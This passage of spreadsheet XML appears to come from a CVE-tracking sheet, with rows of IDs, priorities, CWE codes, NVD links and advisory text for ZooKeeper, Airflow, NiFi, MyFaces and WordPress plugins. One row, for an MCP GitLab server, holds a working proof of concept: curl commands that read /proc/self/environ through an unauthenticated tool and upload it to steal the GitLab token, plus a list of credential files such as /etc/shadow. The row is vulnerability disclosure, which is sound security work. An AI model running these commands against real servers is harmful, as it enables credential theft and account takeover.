        <is>
          <t>CWE-297</t>
        </is>
      </c>
      <c r="R1467" s="5" t="inlineStr">
        <is>
          <t>Apache ZooKeeper quorum TLS fails to enforce peer hostname verification in FIPS-mode deployments. When sslQuorum=true, zookeeper.fips-mode=true, ssl.quorum.hostnameVerification=true, and ssl.quorum.clientHostnameVerification=true are enabled, the Java SSLSocket quorum path accepts a CA-trusted peer certificate whose SAN does not match the connected host. A malicious or misissued peer certificate can therefore join quorum traffic, participate in leader election, and enter replication flows.
Users are recommended to upgrade to version 3.8.7 or 3.9.6, which fixes the issue.</t>
        </is>
      </c>
      <c r="S1467" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-59969</t>
        </is>
      </c>
    </row>
    <row r="1468">
      <c r="A1468" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1468" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1468" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61396</t>
        </is>
      </c>
      <c r="D1468" s="5" t="inlineStr"/>
      <c r="E1468" s="5" t="inlineStr"/>
      <c r="F1468" s="5" t="inlineStr"/>
      <c r="G1468" s="5" t="inlineStr"/>
      <c r="H1468" s="5" t="inlineStr"/>
      <c r="I1468" s="5" t="inlineStr"/>
      <c r="J1468" s="5" t="inlineStr"/>
      <c r="K1468" s="5" t="inlineStr"/>
      <c r="L1468" s="5" t="inlineStr"/>
      <c r="M1468" s="5" t="inlineStr"/>
      <c r="N1468" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1468" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1468" s="5" t="inlineStr"/>
      <c r="Q1468" s="5" t="inlineStr"/>
      <c r="R1468" s="5" t="inlineStr">
        <is>
          <t>Rejected reason: Did not need CVE ID</t>
        </is>
      </c>
      <c r="S1468" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61396</t>
        </is>
      </c>
    </row>
    <row r="1469">
      <c r="A1469" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1469" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C1469" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61560</t>
        </is>
      </c>
      <c r="D1469" s="5" t="inlineStr"/>
      <c r="E1469" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F1469" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G1469" s="5" t="inlineStr"/>
      <c r="H1469" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I1469" s="5" t="inlineStr"/>
      <c r="J1469" s="5" t="inlineStr">
        <is>
          <t>gitlab</t>
        </is>
      </c>
      <c r="K1469" s="5" t="inlineStr"/>
      <c r="L1469" s="5" t="inlineStr">
        <is>
          <t>npm:@zereight/mcp-gitlab</t>
        </is>
      </c>
      <c r="M1469" s="5" t="inlineStr">
        <is>
          <t>2.1.27</t>
        </is>
      </c>
      <c r="N1469" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O1469" s="5" t="inlineStr"/>
      <c r="P1469" s="5" t="inlineStr"/>
      <c r="Q1469" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R1469" s="5" t="inlineStr">
        <is>
          <t>### Summary
The SSE transport mode (`SSE=true`) exposes all MCP tools without any authentication. The `upload_markdown` tool reads arbitrary files from the server's local filesystem via an unsanitized `file_path` parameter and uploads them to a GitLab project. Combined, any unauthenticated network-reachable attacker can read `/proc/self/environ` to steal the server's `GITLAB_PERSONAL_ACCESS_TOKEN` and achieve full GitLab account takeover. This is the default configuration for Docker deployments.
### Details
Two issues chain together:
**1. No authentication on SSE transport (`src/index.ts:7350-7388`)**
When `SSE=true` (the intended mode for Docker deployments per `docker-compose.yaml`), the `/sse` and `/messages` endpoints have zero authentication middleware. Any HTTP client that can reach the port can establish a session and invoke all ~100+ tools using the server's configured PAT.
```typescript
// src/index.ts:7354 — no auth check
app.get("/sse", async (_: Request, res: Response) =&gt; {
    const serverInstance = createServer();
    const transport = new SSEServerTransport("/messages", res);
    await serverInstance.connect(transport);
});
```
Remote Authorization (`REMOTE_AUTHORIZATION=true`) is explicitly incompatible with SSE mode (`src/index.ts:1833-1839`), so there is no way to add per-request auth in this transport.
**2. Arbitrary file read in `upload_markdown` (`src/index.ts:5461-5503`)**
The `upload_markdown` tool calls `fs.readFileSync(filePath)` where `filePath` comes directly from user input with no validation. The Zod schema (`src/schemas.ts:2150-2153`) defines `file_path` as `z.string()` with no path restrictions, allowlists, or sandboxing.
```typescript
async function markdownUpload(projectId: string, filePath: string) {
    if (!fs.existsSync(filePath)) {
        throw new Error(`File not found: ${filePath}`);
    }
    const fileBuffer = fs.readFileSync(filePath);  // Arbitrary file read — no path validation
    // ... uploads to GitLab project via POST /projects/:id/uploads
}
```
This tool is in the `users` toolset, which is **enabled by default**.
**Docker amplification:** The `Dockerfile` has no `USER` directive, so the process runs as root. The `docker-compose.yaml` maps `3002:3002`, which binds `0.0.0.0` by default, exposing the unauthenticated endpoint to the network.
### PoC
**Prerequisites:**
- A running `@zereight/mcp-gitlab` instance with `SSE=true` and `GITLAB_PERSONAL_ACCESS_TOKEN` set (this is the default Docker deployment config)
- Network access to the server's port (default: 3002)
- A GitLab project ID the PAT has write access to (use `list_projects` to enumerate)
**Steps:**
```bash
# 1. Connect to the unauthenticated SSE endpoint and capture the session ID
SESSION_ID=$(curl -s -N http://&lt;HOST&gt;:3002/sse | head -1 | grep -oP 'sessionId=\K[^&amp;\s]+')
# 2. (Optional) Enumerate accessible projects to find a writable project ID
curl -X POST "http://&lt;HOST&gt;:3002/messages?sessionId=$SESSION_ID" \
  -H "Content-Type: application/json" \
  -d '{
    "jsonrpc": "2.0",
    "id": 1,
    "method": "tools/call",
    "params": {
      "name": "list_projects",
      "arguments": {"owned": true}
    }
  }'
# 3. Read /proc/self/environ (contains GITLAB_PERSONAL_ACCESS_TOKEN in plaintext)
#    and upload it to a GitLab project
curl -X POST "http://&lt;HOST&gt;:3002/messages?sessionId=$SESSION_ID" \
  -H "Content-Type: application/json" \
  -d '{
    "jsonrpc": "2.0",
    "id": 2,
    "method": "tools/call",
    "params": {
      "name": "upload_markdown",
      "arguments": {
        "project_id": "&lt;WRITABLE_PROJECT_ID&gt;",
        "file_path": "/proc/self/environ"
      }
    }
  }'
# 4. The response contains a GitLab upload URL like:
#    {"markdown": "![environ](/uploads/abc123def456/environ)", "url": "/uploads/abc123def456/environ"}
#
# 5. Retrieve the uploaded file from GitLab:
curl "https://gitlab.example.com/&lt;namespace&gt;/&lt;project&gt;/uploads/abc123def456/environ"
# 6. The file contains NUL-separated environment variables including:
#    GITLAB_PERSONAL_ACCESS_TOKEN=glpat-xxxxxxxxxxxxxxxxxxxx
#
# 7. Use the stolen PAT for full GitLab API access:
curl -H "Private-Token: glpat-xxxxxxxxxxxxxxxxxxxx" "https://gitlab.example.com/api/v4/user"
```
**Other exfiltrable targets (running as root in Docker):**
| File | Contents |
|---|---|
| `/proc/self/environ` | All env vars including `GITLAB_PERSONAL_ACCESS_TOKEN=glpat-xxxxx` |
| `/proc/self/cmdline` | Command line args (token if passed via CLI) |
| `/etc/shadow` | System password hashes |
| `/app/build/index.js` | Full application source code |
| `~/.gitlab-mcp-token.json` | OAuth tokens (if OAuth mode was used) |
### Impact
**Unauthenticated full GitLab account takeover.** Any attacker with network access to the MCP server port can steal the Personal Access Token and gain complete access to the GitLab instance as the token owner - including all repositories, CI/CD secrets and variables, deploy keys, project settings, and admin functions if the user has admin privileges. No credentials or user interaction are required. This is the default configuration for Docker deployments</t>
        </is>
      </c>
      <c r="S1469" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61560</t>
        </is>
      </c>
    </row>
    <row r="1470">
      <c r="A1470" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1470" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1470" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-65388</t>
        </is>
      </c>
      <c r="D1470" s="5" t="inlineStr"/>
      <c r="E1470" s="5" t="inlineStr"/>
      <c r="F1470" s="5" t="inlineStr"/>
      <c r="G1470" s="5" t="inlineStr"/>
      <c r="H1470" s="5" t="inlineStr"/>
      <c r="I1470" s="5" t="inlineStr"/>
      <c r="J1470" s="5" t="inlineStr"/>
      <c r="K1470" s="5" t="inlineStr"/>
      <c r="L1470" s="5" t="inlineStr"/>
      <c r="M1470" s="5" t="inlineStr"/>
      <c r="N1470" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1470" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1470" s="5" t="inlineStr"/>
      <c r="Q1470" s="5" t="inlineStr"/>
      <c r="R1470" s="5" t="inlineStr">
        <is>
          <t>A remote attacker who controls a container registry may be able to direct a client's token request to a host of the attacker's choice, and disclose the victim's registry credentials to that host. This vulnerability is addressed in containerization version 0.41.0.</t>
        </is>
      </c>
      <c r="S1470" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-65388</t>
        </is>
      </c>
    </row>
    <row r="1471">
      <c r="A1471" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1471" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1471" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68536</t>
        </is>
      </c>
      <c r="D1471" s="5" t="inlineStr"/>
      <c r="E1471" s="5" t="inlineStr"/>
      <c r="F1471" s="5" t="inlineStr"/>
      <c r="G1471" s="5" t="inlineStr"/>
      <c r="H1471" s="5" t="inlineStr"/>
      <c r="I1471" s="5" t="inlineStr"/>
      <c r="J1471" s="5" t="inlineStr"/>
      <c r="K1471" s="5" t="inlineStr"/>
      <c r="L1471" s="5" t="inlineStr"/>
      <c r="M1471" s="5" t="inlineStr"/>
      <c r="N1471" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1471" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1471" s="5" t="inlineStr"/>
      <c r="Q1471" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="R1471" s="5" t="inlineStr">
        <is>
          <t>Server-Side Request Forgery / Local File Inclusion in Apache MyFace Core.
Older unsupported versions may also be affected. 
Users are recommended to upgrade to versions 2.3.12, 2.3-next-M9, 3.0.4, 4.0.4, or 4.1.4, which fix this issue.</t>
        </is>
      </c>
      <c r="S1471" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68536</t>
        </is>
      </c>
    </row>
    <row r="1472">
      <c r="A1472" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1472" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1472" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70469</t>
        </is>
      </c>
      <c r="D1472" s="5" t="inlineStr"/>
      <c r="E1472" s="5" t="inlineStr"/>
      <c r="F1472" s="5" t="inlineStr"/>
      <c r="G1472" s="5" t="inlineStr"/>
      <c r="H1472" s="5" t="inlineStr"/>
      <c r="I1472" s="5" t="inlineStr"/>
      <c r="J1472" s="5" t="inlineStr"/>
      <c r="K1472" s="5" t="inlineStr"/>
      <c r="L1472" s="5" t="inlineStr"/>
      <c r="M1472" s="5" t="inlineStr"/>
      <c r="N1472" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1472" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1472" s="5" t="inlineStr"/>
      <c r="Q1472" s="5" t="inlineStr">
        <is>
          <t>CWE-409</t>
        </is>
      </c>
      <c r="R1472" s="5" t="inlineStr">
        <is>
          <t>Apache NiFi 2.11.0 disabled support for gzip-encoded HTTP requests for the application REST API and rejected requests that included the standard Content-Encoding header indicating gzip encoding. The framework enforcement filter did not check multiple instances of the Content-Encoding header and did not reject non-standard identifiers for gzip encoding, allowing a malicious client to send crafted requests that could consume excessive amounts of memory. Upgrading to Apache NiFi 2.12.0 is the recommended mitigation, which disables decompression of gzip-encoded HTTP requests regardless of header number or encoding identifiers.</t>
        </is>
      </c>
      <c r="S1472" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70469</t>
        </is>
      </c>
    </row>
    <row r="1473">
      <c r="A1473" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1473" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1473" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-74926</t>
        </is>
      </c>
      <c r="D1473" s="5" t="inlineStr"/>
      <c r="E1473" s="5" t="inlineStr"/>
      <c r="F1473" s="5" t="inlineStr"/>
      <c r="G1473" s="5" t="inlineStr"/>
      <c r="H1473" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1473" s="5" t="inlineStr"/>
      <c r="J1473" s="5" t="inlineStr"/>
      <c r="K1473" s="5" t="inlineStr"/>
      <c r="L1473" s="5" t="inlineStr"/>
      <c r="M1473" s="5" t="inlineStr"/>
      <c r="N1473" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1473" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1473" s="5" t="inlineStr"/>
      <c r="Q1473" s="5" t="inlineStr"/>
      <c r="R1473" s="5" t="inlineStr">
        <is>
          <t>The MultiVendorX  WordPress plugin before 5.0.16 does not verify that a user owns the store they are acting on in one of its REST API routes, allowing any authenticated user, such as a subscriber, to overwrite any store's details and payout settings and to replace the record of who owns it.</t>
        </is>
      </c>
      <c r="S1473" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-74926</t>
        </is>
      </c>
    </row>
    <row r="1474">
      <c r="A1474" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1474" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1474" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76186</t>
        </is>
      </c>
      <c r="D1474" s="5" t="inlineStr"/>
      <c r="E1474" s="5" t="inlineStr"/>
      <c r="F1474" s="5" t="inlineStr"/>
      <c r="G1474" s="5" t="inlineStr"/>
      <c r="H1474" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1474" s="5" t="inlineStr"/>
      <c r="J1474" s="5" t="inlineStr">
        <is>
          <t>keycloak</t>
        </is>
      </c>
      <c r="K1474" s="5" t="inlineStr"/>
      <c r="L1474" s="5" t="inlineStr"/>
      <c r="M1474" s="5" t="inlineStr"/>
      <c r="N1474" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1474" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1474" s="5" t="inlineStr"/>
      <c r="Q1474" s="5" t="inlineStr">
        <is>
          <t>CWE-565</t>
        </is>
      </c>
      <c r="R1474" s="5" t="inlineStr">
        <is>
          <t>Apache Airflow Keycloak provider: from Airflow 3.3 the Keycloak auth manager takes a user's identity from the signed Airflow session token but takes the Keycloak access and refresh tokens used for every authorization decision from separate, unauthenticated cookies, and never checks that the two describe the same subject. A user who holds any valid Airflow login of their own, together with another subject's Keycloak access or refresh token obtained out of band, can pair the two: Airflow then authorizes requests with the foreign token's privileges while the session identity, audit log and cache keys continue to name the attacker's own account. The refresh path re-issues an Airflow session token for the original identity carrying the foreign tokens, so the mismatched pairing survives across sessions.
Affects deployments running Airflow 3.3 or later with the Keycloak auth manager. Earlier versions carried the Keycloak tokens inside the signed session token, so the binding existed and was lost when they moved into separate cookies.
Users of apache-airflow-providers-keycloak are recommended to upgrade to version 0.10.0 or later, which binds the cookie-supplied tokens to the session identity.</t>
        </is>
      </c>
      <c r="S1474" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76186</t>
        </is>
      </c>
    </row>
    <row r="1475">
      <c r="A1475" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1475" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1475" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76187</t>
        </is>
      </c>
      <c r="D1475" s="5" t="inlineStr"/>
      <c r="E1475" s="5" t="inlineStr"/>
      <c r="F1475" s="5" t="inlineStr"/>
      <c r="G1475" s="5" t="inlineStr"/>
      <c r="H1475" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1475" s="5" t="inlineStr"/>
      <c r="J1475" s="5" t="inlineStr">
        <is>
          <t>keycloak</t>
        </is>
      </c>
      <c r="K1475" s="5" t="inlineStr"/>
      <c r="L1475" s="5" t="inlineStr"/>
      <c r="M1475" s="5" t="inlineStr"/>
      <c r="N1475" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1475" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1475" s="5" t="inlineStr"/>
      <c r="Q1475" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="R1475" s="5" t="inlineStr">
        <is>
          <t>Apache Airflow Keycloak provider: the unauthenticated token endpoint accepts a client-credentials grant for any confidential client registered in the Keycloak realm, not only the client configured for Airflow. No allowlist restricts which client ids may authenticate, so the credentials of an unrelated application that happens to share the realm are valid Airflow login credentials, and Airflow mints a signed session token for that application's service account. The endpoint also answers unauthenticated credential guesses against Keycloak under Airflow's identity.
Affects deployments using the Keycloak auth manager whose realm is shared with other confidential clients. The attacker needs valid credentials for any one of those clients, not for Airflow. Resource authorization is still evaluated per subject, so the access gained is whatever that service account holds, plus any endpoint gated only on being authenticated.
Users of apache-airflow-providers-keycloak are recommended to upgrade to version 0.10.0 or later, which accepts only the configured client on that grant.</t>
        </is>
      </c>
      <c r="S1475" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76187</t>
        </is>
      </c>
    </row>
    <row r="1476">
      <c r="A1476" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1476" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1476" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76550</t>
        </is>
      </c>
      <c r="D1476" s="5" t="inlineStr"/>
      <c r="E1476" s="5" t="inlineStr"/>
      <c r="F1476" s="5" t="inlineStr"/>
      <c r="G1476" s="5" t="inlineStr"/>
      <c r="H1476" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1476" s="5" t="inlineStr"/>
      <c r="J1476" s="5" t="inlineStr"/>
      <c r="K1476" s="5" t="inlineStr"/>
      <c r="L1476" s="5" t="inlineStr"/>
      <c r="M1476" s="5" t="inlineStr"/>
      <c r="N1476" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1476" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1476" s="5" t="inlineStr"/>
      <c r="Q1476" s="5" t="inlineStr"/>
      <c r="R1476" s="5" t="inlineStr">
        <is>
          <t>The WP Import Export Lite WordPress plugin before 3.9.34 does not validate a user-supplied output path when writing export files, allowing users granted its export permission to write files with arbitrary names to arbitrary locations on the server, leading to remote code execution.</t>
        </is>
      </c>
      <c r="S1476" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76550</t>
        </is>
      </c>
    </row>
    <row r="1477">
      <c r="A1477" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1477" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1477" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76551</t>
        </is>
      </c>
      <c r="D1477" s="5" t="inlineStr"/>
      <c r="E1477" s="5" t="inlineStr"/>
      <c r="F1477" s="5" t="inlineStr"/>
      <c r="G1477" s="5" t="inlineStr"/>
      <c r="H1477" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1477" s="5" t="inlineStr"/>
      <c r="J1477" s="5" t="inlineStr"/>
      <c r="K1477" s="5" t="inlineStr"/>
      <c r="L1477" s="5" t="inlineStr"/>
      <c r="M1477" s="5" t="inlineStr"/>
      <c r="N1477" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1477" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1477" s="5" t="inlineStr"/>
      <c r="Q1477" s="5" t="inlineStr"/>
      <c r="R1477" s="5" t="inlineStr">
        <is>
          <t>The WP Import Export Lite WordPress plugin before 3.9.33 does not restrict which PHP function may be applied to exported field values, allowing users granted its export permission to have arbitrary functions invoked on values they control, leading to remote code execution.</t>
        </is>
      </c>
      <c r="S1477" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76551</t>
        </is>
      </c>
    </row>
    <row r="1478">
      <c r="A1478" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1478" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1478" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76552</t>
        </is>
      </c>
      <c r="D1478" s="5" t="inlineStr"/>
      <c r="E1478" s="5" t="inlineStr"/>
      <c r="F1478" s="5" t="inlineStr"/>
      <c r="G1478" s="5" t="inlineStr"/>
      <c r="H1478" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1478" s="5" t="inlineStr"/>
      <c r="J1478" s="5" t="inlineStr"/>
      <c r="K1478" s="5" t="inlineStr"/>
      <c r="L1478" s="5" t="inlineStr"/>
      <c r="M1478" s="5" t="inlineStr"/>
      <c r="N1478" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1478" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1478" s="5" t="inlineStr"/>
      <c r="Q1478" s="5" t="inlineStr"/>
      <c r="R1478" s="5" t="inlineStr">
        <is>
          <t>The WP Import Export Lite WordPress plugin before 3.9.33 does not validate the type, extension or content of files it retrieves from a user-supplied URL during import, allowing users granted its import permission to store arbitrary files, including executable ones, on the server and achieve remote code execution.</t>
        </is>
      </c>
      <c r="S1478" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76552</t>
        </is>
      </c>
    </row>
    <row r="1479">
      <c r="A1479" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1479" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1479" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76553</t>
        </is>
      </c>
      <c r="D1479" s="5" t="inlineStr"/>
      <c r="E1479" s="5" t="inlineStr"/>
      <c r="F1479" s="5" t="inlineStr"/>
      <c r="G1479" s="5" t="inlineStr"/>
      <c r="H1479" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1479" s="5" t="inlineStr"/>
      <c r="J1479" s="5" t="inlineStr"/>
      <c r="K1479" s="5" t="inlineStr"/>
      <c r="L1479" s="5" t="inlineStr"/>
      <c r="M1479" s="5" t="inlineStr"/>
      <c r="N1479" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1479" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1479" s="5" t="inlineStr"/>
      <c r="Q1479" s="5" t="inlineStr"/>
      <c r="R1479" s="5" t="inlineStr">
        <is>
          <t>The WP Import Export Lite WordPress plugin before 3.9.33 does not validate a path taken from stored, user-supplied data before recursively deleting the directory it resolves to, allowing users to whom an administrator has delegated a WP Import Export Lite WordPress plugin before 3.9.33 capability to delete arbitrary directories, and every file within them, including outside the web root.</t>
        </is>
      </c>
      <c r="S1479" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76553</t>
        </is>
      </c>
    </row>
    <row r="1480">
      <c r="A1480" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1480" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1480" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76555</t>
        </is>
      </c>
      <c r="D1480" s="5" t="inlineStr"/>
      <c r="E1480" s="5" t="inlineStr"/>
      <c r="F1480" s="5" t="inlineStr"/>
      <c r="G1480" s="5" t="inlineStr"/>
      <c r="H1480" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1480" s="5" t="inlineStr"/>
      <c r="J1480" s="5" t="inlineStr"/>
      <c r="K1480" s="5" t="inlineStr"/>
      <c r="L1480" s="5" t="inlineStr"/>
      <c r="M1480" s="5" t="inlineStr"/>
      <c r="N1480" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1480" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1480" s="5" t="inlineStr"/>
      <c r="Q1480" s="5" t="inlineStr"/>
      <c r="R1480" s="5" t="inlineStr">
        <is>
          <t>The WP Import Export Lite WordPress plugin before 3.9.33 does not validate a user-supplied file path before reading it and copying it into a publicly accessible directory, allowing any user whose role an administrator has granted the WP Import Export Lite WordPress plugin before 3.9.33's import permission to disclose sensitive files from the server, including files located outside the web root. The same code path also relaxes the file-system permissions of any path it is given, whether or not the copy succeeds.</t>
        </is>
      </c>
      <c r="S1480" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76555</t>
        </is>
      </c>
    </row>
    <row r="1481">
      <c r="A1481" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1481" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1481" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76556</t>
        </is>
      </c>
      <c r="D1481" s="5" t="inlineStr"/>
      <c r="E1481" s="5" t="inlineStr"/>
      <c r="F1481" s="5" t="inlineStr"/>
      <c r="G1481" s="5" t="inlineStr"/>
      <c r="H1481" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1481" s="5" t="inlineStr"/>
      <c r="J1481" s="5" t="inlineStr"/>
      <c r="K1481" s="5" t="inlineStr"/>
      <c r="L1481" s="5" t="inlineStr"/>
      <c r="M1481" s="5" t="inlineStr"/>
      <c r="N1481" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1481" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1481" s="5" t="inlineStr"/>
      <c r="Q1481" s="5" t="inlineStr"/>
      <c r="R1481" s="5" t="inlineStr">
        <is>
          <t>The WP Import Export Lite WordPress plugin before 3.9.33 does not properly sanitise and escape some export filter values before using them in SQL statements, allowing users holding its export permission, which administrators have by default and may also grant to lower roles, to perform SQL injection attacks.</t>
        </is>
      </c>
      <c r="S1481" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76556</t>
        </is>
      </c>
    </row>
    <row r="1482">
      <c r="A1482" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1482" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1482" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76557</t>
        </is>
      </c>
      <c r="D1482" s="5" t="inlineStr"/>
      <c r="E1482" s="5" t="inlineStr"/>
      <c r="F1482" s="5" t="inlineStr"/>
      <c r="G1482" s="5" t="inlineStr"/>
      <c r="H1482" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1482" s="5" t="inlineStr"/>
      <c r="J1482" s="5" t="inlineStr"/>
      <c r="K1482" s="5" t="inlineStr"/>
      <c r="L1482" s="5" t="inlineStr"/>
      <c r="M1482" s="5" t="inlineStr"/>
      <c r="N1482" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1482" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1482" s="5" t="inlineStr"/>
      <c r="Q1482" s="5" t="inlineStr"/>
      <c r="R1482" s="5" t="inlineStr">
        <is>
          <t>The WP Import Export Lite WordPress plugin before 3.9.33 does not properly sanitise and escape some import configuration values before using them in SQL statements, allowing users whose role an administrator has granted the WP Import Export Lite WordPress plugin before 3.9.33's import permission to perform SQL injection attacks.</t>
        </is>
      </c>
